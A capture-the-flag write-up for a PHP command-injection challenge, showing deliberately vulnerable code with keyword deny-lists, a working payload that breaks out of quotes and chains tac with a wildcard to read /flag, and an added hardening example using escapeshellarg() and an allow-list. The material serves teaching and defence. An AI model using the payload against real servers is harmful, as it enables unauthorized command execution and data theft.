[CTFHUB]EasyBypass
Approach

<?php
highlight_file(__FILE__);
$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];
if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
$comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
$comm2 = "";
$flag = "#flag in /flag";
$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
$cmd = "file $comm1 $comm2";
system($cmd);
?>
cannot open `' (No such file or directory) cannot open `' (No such file or directory)
Solution

The filter on comm1 is not as strict as the one on comm2, so comm1 can be used to build a tac command that reads the file.

- Use `"` to close the quoting in `$comm1 = '"' . $comm1 . '"';`
- Use `;` to terminate the preceding file command and the current command; even if the file command fails, it does not affect the other commands
- Use `?` as a wildcard for a single character
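As an added hardening example (not part of the original write-up or the challenge code), the same command construction with escapeshellarg() and an allow-list, showing why closing the quote no longer works; the allow-list policy and function names are assumptions of this example.

```php
<?php
// Added example, not the challenge's code. The challenge builds
//   '"' . $comm1 . '"'
// so a " in the input closes the quotes and a ; starts a new command.
// The deny-list regex is fragile too: the comm2 pattern even contains an
// empty alternative (less||tac), so it matches every input.
// escapeshellarg() quotes the whole argument as one literal shell word,
// and an allow-list of file names is far narrower than any keyword deny-list.
declare(strict_types=1);

// Hypothetical policy: plain relative file names only (letters, digits,
// dot, dash, underscore), no traversal, no leading '-' (option injection).
function is_safe_filename(string $name): bool
{
    return $name !== ''
        && strlen($name) <= 64
        && $name[0] !== '-'
        && strpos($name, '..') === false
        && preg_match('/\A[A-Za-z0-9._-]+\z/', $name) === 1;
}

// Same command shape as the challenge, but each argument is validated and
// then quoted by escapeshellarg(), so it can never break out of its quotes.
function build_file_cmd(string $comm1, string $comm2): ?string
{
    if (!is_safe_filename($comm1) || !is_safe_filename($comm2)) {
        return null; // reject, instead of silently emptying the argument
    }
    return 'file ' . escapeshellarg($comm1) . ' ' . escapeshellarg($comm2);
}

// Constructed inputs: the write-up's comm1 payload, then benign names.
$injected = build_file_cmd('";tac /fla?;"', '1');
var_dump($injected);   // rejected by the allow-list, nothing reaches the shell

$benign = build_file_cmd('notes.txt', 'image.png');
var_dump($benign);     // a single, fully quoted file command

// Even without the allow-list, escapeshellarg() alone neutralises the
// break-out: the payload is wrapped in single quotes, so the embedded ",
// ; and ? are passed to `file` literally instead of being parsed by the shell.
var_dump(escapeshellarg('";tac /fla?;"'));

if ($benign !== null) {
    system($benign);
}
```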
payload:
/?comm1=";tac%20/fla?;"&comm2=1
Notes

- Linux multi-command execution (;)
- Linux file reading (tac)
- Linux command wildcard (?)